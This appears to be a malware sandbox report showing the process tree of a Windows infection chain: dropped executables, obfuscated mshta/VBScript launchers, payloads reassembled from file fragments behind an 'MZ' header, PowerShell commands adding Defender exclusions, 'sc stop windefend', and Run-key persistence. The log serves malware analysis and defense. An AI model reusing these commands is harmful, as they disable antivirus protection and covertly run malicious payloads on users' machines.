                      cmd: "C:\Windows\System32\mshta.exe" vbscRIpt: cLosE ( CreateOBjEct ( "WsCrIpT.shelL"). Run ( "cMD /q /c cOPy /Y ""C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe"" ..\RxAPuFNW.exe && sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i & IF ""-P1jBMdKQQ16j1dp4oT~i "" == """" for %Z iN ( ""C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe"" ) do taskkill -f -Im ""%~NXZ"" ", 0, TRUE ))
                      PID: 7020
                      C:\Windows\SysWOW64\cmd.exe
                        cmd: "C:\Windows\System32\cmd.exe" /q /c cOPy /Y "C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe" ..\RxAPuFNW.exe &&sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i &IF "-P1jBMdKQQ16j1dp4oT~i " == "" for %Z iN ( "C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe" ) do taskkill -f -Im "%~NXZ"
                        PID: 7144
                    C:\Windows\SysWOW64\mshta.exe
                      cmd: "C:\Windows\System32\mshta.exe" VBSCRipT: CLOse ( createoBJECt ( "wScRIpt.shelL" ).RUn ("cMd /C EChO | SEt /p = ""MZ"" > CPkPI.i & CopY /b /Y CPkpI.I+ sQCC.RrX + NvzjY~Q7.S1K+ FZOB0ELr.D +wXR7c.DF ..\WfNrfms4.K & StARt control ..\WfNRfms4.K & Del /Q * " , 0 ,tRue ) )
                      PID: 6560
                      C:\Windows\SysWOW64\cmd.exe
                        cmd: "C:\Windows\System32\cmd.exe" /C EChO | SEt /p = "MZ" > CPkPI.i &CopY /b /Y CPkpI.I+ sQCC.RrX + NvzjY~Q7.S1K+ FZOB0ELr.D +wXR7c.DF ..\WfNrfms4.K & StARt control ..\WfNRfms4.K &Del /Q *
                        PID: 6136
                        C:\Windows\SysWOW64\cmd.exe
                          cmd: C:\Windows\system32\cmd.exe /S /D /c" SEt /p = "MZ" 1>CPkPI.i"
                          PID: 6292
                        C:\Windows\SysWOW64\cmd.exe
                          cmd: C:\Windows\system32\cmd.exe /S /D /c" EChO "
                          PID: 3028
                        C:\Windows\SysWOW64\control.exe
                          cmd: control ..\WfNRfms4.K
                          PID: 1032
                          C:\Windows\SysWOW64\rundll32.exe
                            cmd: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\WfNRfms4.K
                            - Loads dropped DLL
                            PID: 720
                            C:\Windows\system32\RunDll32.exe
                              cmd: C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\WfNRfms4.K
                              - Suspicious use of NtCreateProcessExOtherParentProcess
                              PID: 5844
                              C:\Windows\SysWOW64\rundll32.exe
                                cmd: "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\WfNRfms4.K
                                - Loads dropped DLL
                                PID: 7108
                  C:\Windows\SysWOW64\taskkill.exe
                    cmd: taskkill -f -Im "3601344.exe"
                    - Kills process with taskkill
                    PID: 7008
            C:\Users\Admin\AppData\Roaming\189629.exe
              cmd: "C:\Users\Admin\AppData\Roaming\189629.exe"
              PID: 1460
              C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                cmd: "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                - Executes dropped EXE
                PID: 6204
            C:\Users\Admin\AppData\Roaming\503782.exe
              cmd: "C:\Users\Admin\AppData\Roaming\503782.exe"
              - Executes dropped EXE
              - Suspicious use of AdjustPrivilegeToken
              PID: 5644
        C:\Windows\SysWOW64\cmd.exe
          cmd: C:\Windows\system32\cmd.exe /c Wed121f7e9e92793cf.exe
          PID: 2384
        C:\Windows\SysWOW64\cmd.exe
          cmd: C:\Windows\system32\cmd.exe /c Wed129eb9b8859.exe
          PID: 1380
          C:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\Wed129eb9b8859.exe
            cmd: Wed129eb9b8859.exe
            - Executes dropped EXE
            - Suspicious behavior: EnumeratesProcesses
            PID: 1812
            C:\Users\Admin\Pictures\Adobe Films\kbTxHZeYOomBllay3dpYIR9f.exe
              cmd: "C:\Users\Admin\Pictures\Adobe Films\kbTxHZeYOomBllay3dpYIR9f.exe"
              - Executes dropped EXE
              PID: 5752
            C:\Users\Admin\Pictures\Adobe Films\CUdVFaUwSqvIYDEDWI1VHn3_.exe
              cmd: "C:\Users\Admin\Pictures\Adobe Films\CUdVFaUwSqvIYDEDWI1VHn3_.exe"
              - Executes dropped EXE
              PID: 2960
              C:\Windows\SysWOW64\WerFault.exe
                cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 2960 -s 280
                - Program crash
                - Checks processor information in registry
                - Enumerates system info in registry
                PID: 6288
            C:\Users\Admin\Pictures\Adobe Films\PsHhTfowuIHRylZl4gkpCI9u.exe
              cmd: "C:\Users\Admin\Pictures\Adobe Films\PsHhTfowuIHRylZl4gkpCI9u.exe"
              - Executes dropped EXE
              PID: 408
              C:\Windows\SysWOW64\WerFault.exe
                cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 408 -s 280
                - Program crash
                - Enumerates system info in registry
                PID: 4640
            C:\Users\Admin\Pictures\Adobe Films\hgFUPQSfVWja4bF9va2Nco94.exe
              cmd: "C:\Users\Admin\Pictures\Adobe Films\hgFUPQSfVWja4bF9va2Nco94.exe"
              - Executes dropped EXE
              - Drops startup file
              - Windows security modification
              - Adds Run key to start application
              - Checks whether UAC is enabled
              - Suspicious use of SetThreadContext
              - Drops file in Program Files directory
              - System policy modification
              PID: 5956
              C:\Users\Admin\AppData\Local\Temp\acfd18df-7bf3-438a-b223-d663daf805dc\AdvancedRun.exe
                cmd: "C:\Users\Admin\AppData\Local\Temp\acfd18df-7bf3-438a-b223-d663daf805dc\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\acfd18df-7bf3-438a-b223-d663daf805dc\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
                - Executes dropped EXE
                - Suspicious use of AdjustPrivilegeToken
                PID: 5676
                C:\Windows\system32\cmd.exe
                  cmd: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\acfd18df-7bf3-438a-b223-d663daf805dc\test.bat"
                  PID: 6472
              C:\Users\Admin\AppData\Local\Temp\f1365d3d-b11e-4e52-9a7b-f9e9ac80ba64\AdvancedRun.exe
                cmd: "C:\Users\Admin\AppData\Local\Temp\f1365d3d-b11e-4e52-9a7b-f9e9ac80ba64\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\f1365d3d-b11e-4e52-9a7b-f9e9ac80ba64\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
                - Executes dropped EXE
                - Suspicious use of AdjustPrivilegeToken
                PID: 5660
                C:\Windows\system32\cmd.exe
                  cmd: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\f1365d3d-b11e-4e52-9a7b-f9e9ac80ba64\test.bat"
                  PID: 6392
              C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                cmd: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\hgFUPQSfVWja4bF9va2Nco94.exe" -Force
                PID: 7116
              C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                cmd: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\hgFUPQSfVWja4bF9va2Nco94.exe" -Force
                PID: 6524
              C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                cmd: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\hgFUPQSfVWja4bF9va2Nco94.exe" -Force
                PID: 6632
              C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                cmd: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hepatocyte.exe" -Force
                - Executes dropped EXE
                PID: 1548
              C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                cmd: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hepatocyte.exe" -Force
                PID: 3416
              C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                cmd: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\hgFUPQSfVWja4bF9va2Nco94.exe" -Force
                PID: 6668
                C:\Windows\System32\Conhost.exe
                  cmd: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  - Executes dropped EXE
                  - Adds Run key to start application
                  PID: 1460
              C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                cmd: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\sememe\svchost.exe" -Force
                PID: 1164
              C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                cmd: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\hgFUPQSfVWja4bF9va2Nco94.exe" -Force
                PID: 2552
              C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hepatocyte.exe
                cmd: "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hepatocyte.exe"
                - Adds Run key to start application
                - Checks whether UAC is enabled
                - Suspicious use of SetThreadContext
                - System policy modification
                PID: 2788
                C:\Users\Admin\AppData\Local\Temp\75874e51-47d4-4380-afdb-099684f05875\AdvancedRun.exe
                  cmd: "C:\Users\Admin\AppData\Local\Temp\75874e51-47d4-4380-afdb-099684f05875\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\75874e51-47d4-4380-afdb-099684f05875\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
                  PID: 256
                  C:\Windows\system32\cmd.exe
                    cmd: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\75874e51-47d4-4380-afdb-099684f05875\test.bat"
                    PID: 4068
                    C:\Windows\system32\sc.exe
                      cmd: sc stop windefend
                      PID: 6724
                C:\Users\Admin\AppData\Local\Temp\d96e0bdc-f750-403a-8fa4-f90aedee2def\AdvancedRun.exe
                  cmd: "C:\Users\Admin\AppData\Local\Temp\d96e0bdc-f750-403a-8fa4-f90aedee2def\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\d96e0bdc-f750-403a-8fa4-f90aedee2def\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
                  PID: 6896
                  C:\Windows\system32\cmd.exe
                    cmd: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\d96e0bdc-f750-403a-8fa4-f90aedee2def\test.bat"
                    PID: 6076
                    C:\Windows\system32\sc.exe
                      cmd: sc stop windefend
                      PID: 888
                C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  cmd: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hepatocyte.exe" -Force
                  PID: 6196
                C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  cmd: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hepatocyte.exe" -Force
                  PID: 3260
                C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  cmd: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\sememe\svchost.exe" -Force
                  PID: 1968
                C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  cmd: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hepatocyte.exe" -Force
                  PID: 2248
                C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  cmd: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hepatocyte.exe" -Force
                  PID: 3320
                C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  cmd: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\sememe\svchost.exe" -Force
                  PID: 8352
                C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInUtil.exe
                  cmd: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInUtil.exe"
                  PID: 8788
                C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  cmd: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                  PID: 7368
              C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                cmd: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\sememe\svchost.exe" -Force
                PID: 6800
              C:\Windows\Microsoft.NET\Framework\v4.0.30319\EdmGen.exe
                cmd: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\EdmGen.exe"
                PID: 1180
              C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe
                cmd: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe"
                PID: 6416
              C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe
                cmd: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe"
                PID: 7452
              C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInUtil.exe
                cmd: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInUtil.exe"
                PID: 7840
              C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                cmd: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                PID: 8096
              C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                cmd: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                PID: 7472
            C:\Users\Admin\Pictures\Adobe Films\xhLgwAN_sWKad0Gt0LiD3lLz.exe
              cmd: "C:\Users\Admin\Pictures\Adobe Films\xhLgwAN_sWKad0Gt0LiD3lLz.exe"
              PID: 5932
              C:\Windows\SysWOW64\WerFault.exe
                cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 5932 -s 1868
                - Program crash
                - Enumerates system info in registry
                PID: 7156
            C:\Users\Admin\Pictures\Adobe Films\JoVBqle5ZuYZOmKRj95tPfGf.exe
              cmd: "C:\Users\Admin\Pictures\Adobe Films\JoVBqle5ZuYZOmKRj95tPfGf.exe"
              - Executes dropped EXE
              - Suspicious use of SetThreadContext
              PID: 6004
              C:\Users\Admin\Pictures\Adobe Films\JoVBqle5ZuYZOmKRj95tPfGf.exe
                cmd: "C:\Users\Admin\Pictures\Adobe Films\JoVBqle5ZuYZOmKRj95tPfGf.exe"
                - Executes dropped EXE
                - Checks SCSI registry key(s)
                - Suspicious behavior: MapViewOfSection
                PID: 5592
            C:\Users\Admin\Pictures\Adobe Films\YROaLuGWqMiLNO5MI0NxWjDx.exe
              cmd: "C:\Users\Admin\Pictures\Adobe Films\YROaLuGWqMiLNO5MI0NxWjDx.exe"
              PID: 1548
              C:\Windows\SysWOW64\mshta.exe
                cmd: "C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\YROaLuGWqMiLNO5MI0NxWjDx.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\YROaLuGWqMiLNO5MI0NxWjDx.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
                PID: 920
                C:\Windows\SysWOW64\cmd.exe
                  cmd: "C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\YROaLuGWqMiLNO5MI0NxWjDx.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\YROaLuGWqMiLNO5MI0NxWjDx.exe" ) do taskkill -im "%~NxK" -F
                  PID: 3956
                  C:\Users\Admin\AppData\Local\Temp\8pWB.eXE
                    cmd: 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP
                    - Executes dropped EXE
                    PID: 1080
                    C:\Windows\SysWOW64\mshta.exe
                      cmd: "C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
                      PID: 6324
                      C:\Windows\SysWOW64\cmd.exe
                        cmd: "C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F
                        PID: 6532
                    C:\Windows\SysWOW64\mshta.exe
                      cmd: "C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ("WSCRIPt.SheLl" ). rUn ("C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl + _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " ,0 , TruE ) )
                      PID: 6736
                      C:\Windows\SysWOW64\cmd.exe
                        cmd: "C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl+ _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY
                        PID: 6396
                        C:\Windows\SysWOW64\cmd.exe
                          cmd: C:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"
                          PID: 7960
                        C:\Windows\SysWOW64\cmd.exe
                          cmd: C:\Windows\system32\cmd.exe /S /D /c" EcHO "
                          PID: 7952
                        C:\Windows\SysWOW64\msiexec.exe
                          cmd: msiexec.exe -y .\N3V4H8H.SXY
                          - Loads dropped DLL
                          PID: 8760
                  C:\Windows\SysWOW64\taskkill.exe
                    cmd: taskkill -im "YROaLuGWqMiLNO5MI0NxWjDx.exe" -F
                    - Kills process with taskkill
                    PID: 5152
            C:\Users\Admin\Pictures\Adobe Films\_WjLopI0SGjVoK1vv4RABWvT.exe
              cmd: "C:\Users\Admin\Pictures\Adobe Films\_WjLopI0SGjVoK1vv4RABWvT.exe"
              PID: 5348
              C:\Users\Admin\Pictures\Adobe Films\_WjLopI0SGjVoK1vv4RABWvT.exe
                cmd: "C:\Users\Admin\Pictures\Adobe Films\_WjLopI0SGjVoK1vv4RABWvT.exe"
                - Executes dropped EXE
                PID: 2148
              C:\Users\Admin\Pictures\Adobe Films\_WjLopI0SGjVoK1vv4RABWvT.exe
                cmd: "C:\Users\Admin\Pictures\Adobe Films\_WjLopI0SGjVoK1vv4RABWvT.exe"
                - Executes dropped EXE
                PID: 6456
            C:\Users\Admin\Pictures\Adobe Films\M6jzD4DsN636MdsrSCLyMxNK.exe
              cmd: "C:\Users\Admin\Pictures\Adobe Films\M6jzD4DsN636MdsrSCLyMxNK.exe"
              PID: 5824
              C:\Windows\SysWOW64\WerFault.exe
                cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 5824 -s 280
- Program crash
PID:6884
-
-
-
C:\Users\Admin\Pictures\Adobe Films\SS9XSoZmzR6yTxeWosrHLE5V.exe"C:\Users\Admin\Pictures\Adobe Films\SS9XSoZmzR6yTxeWosrHLE5V.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3248 -
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=18⤵
- Loads dropped DLL
- Adds Run key to start application
PID:5492 -
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--bo6y9QQgnM"9⤵PID:7636
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x214,0x218,0x21c,0x1f0,0x220,0x7ff86f36dec0,0x7ff86f36ded0,0x7ff86f36dee010⤵PID:8916
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x13c,0x140,0x144,0x118,0x148,0x7ff6a57f9e70,0x7ff6a57f9e80,0x7ff6a57f9e9011⤵PID:8768
-
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1728,2548857345635655658,17593232224503436592,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7636_1137790179" --mojo-platform-channel-handle=1792 /prefetch:810⤵PID:2656
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1728,2548857345635655658,17593232224503436592,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7636_1137790179" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1744 /prefetch:210⤵PID:5524
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\LtPGrXM6HcaPC22YEKYV8Nfi.exe"C:\Users\Admin\Pictures\Adobe Films\LtPGrXM6HcaPC22YEKYV8Nfi.exe"7⤵
- Executes dropped EXE
PID:2432 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2432 -s 2768⤵
- Program crash
- Enumerates system info in registry
PID:3044
-
-
-
C:\Users\Admin\Pictures\Adobe Films\D_BLDnDHu_TD3iz9CSGyBFPI.exe"C:\Users\Admin\Pictures\Adobe Films\D_BLDnDHu_TD3iz9CSGyBFPI.exe"7⤵
- Executes dropped EXE
PID:6156
-
-
C:\Users\Admin\Pictures\Adobe Films\D889cNcc5Y_B8MT1CZoqotRj.exe"C:\Users\Admin\Pictures\Adobe Films\D889cNcc5Y_B8MT1CZoqotRj.exe"7⤵
- Executes dropped EXE
PID:5816 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5816 -s 3368⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6240
-
-
-
C:\Users\Admin\Pictures\Adobe Films\xf7rCbRH4pGRa62Ofza35vUU.exe"C:\Users\Admin\Pictures\Adobe Films\xf7rCbRH4pGRa62Ofza35vUU.exe"7⤵
- Executes dropped EXE
PID:6832 -
C:\Users\Admin\AppData\Roaming\Underdress.exeC:\Users\Admin\AppData\Roaming\Underdress.exe8⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:6884 -
C:\Users\Admin\AppData\Local\Temp\Unseduceability.exe"C:\Users\Admin\AppData\Local\Temp\Unseduceability.exe"9⤵PID:7060
-
-
-
C:\Users\Admin\AppData\Roaming\MegogoSell_crypted.exeC:\Users\Admin\AppData\Roaming\MegogoSell_crypted.exe8⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
PID:6892 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"9⤵PID:1416
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\eE5C0JFpVRfv_DCeuMEdyY5r.exe"C:\Users\Admin\Pictures\Adobe Films\eE5C0JFpVRfv_DCeuMEdyY5r.exe"7⤵PID:2012
-
-
C:\Users\Admin\Pictures\Adobe Films\54p61i9IToLUgwDR5Xc2JSXD.exe"C:\Users\Admin\Pictures\Adobe Films\54p61i9IToLUgwDR5Xc2JSXD.exe"7⤵PID:6920
-
C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"8⤵PID:6100
-
C:\Users\Admin\AppData\Local\3839976.exe"C:\Users\Admin\AppData\Local\3839976.exe"9⤵PID:2272
-
-
C:\Users\Admin\AppData\Local\8588289.exe"C:\Users\Admin\AppData\Local\8588289.exe"9⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:7848
-
-
C:\Users\Admin\AppData\Local\8736505.exe"C:\Users\Admin\AppData\Local\8736505.exe"9⤵PID:8248
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscRIpt: cLosE ( CreateOBjEct ( "WsCrIpT.shelL"). Run ( "cMD /q /c cOPy /Y ""C:\Users\Admin\AppData\Local\8736505.exe"" ..\RxAPuFNW.exe && sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i & IF """" == """" for %Z iN ( ""C:\Users\Admin\AppData\Local\8736505.exe"" ) do taskkill -f -Im ""%~NXZ"" ", 0, TRUE ))10⤵PID:2092
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /c cOPy /Y "C:\Users\Admin\AppData\Local\8736505.exe" ..\RxAPuFNW.exe &&sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i &IF "" == "" for %Z iN ( "C:\Users\Admin\AppData\Local\8736505.exe" ) do taskkill -f -Im "%~NXZ"11⤵PID:7008
-
C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i12⤵PID:8596
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscRIpt: cLosE ( CreateOBjEct ( "WsCrIpT.shelL"). Run ( "cMD /q /c cOPy /Y ""C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe"" ..\RxAPuFNW.exe && sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i & IF ""-P1jBMdKQQ16j1dp4oT~i "" == """" for %Z iN ( ""C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe"" ) do taskkill -f -Im ""%~NXZ"" ", 0, TRUE ))13⤵PID:8588
-
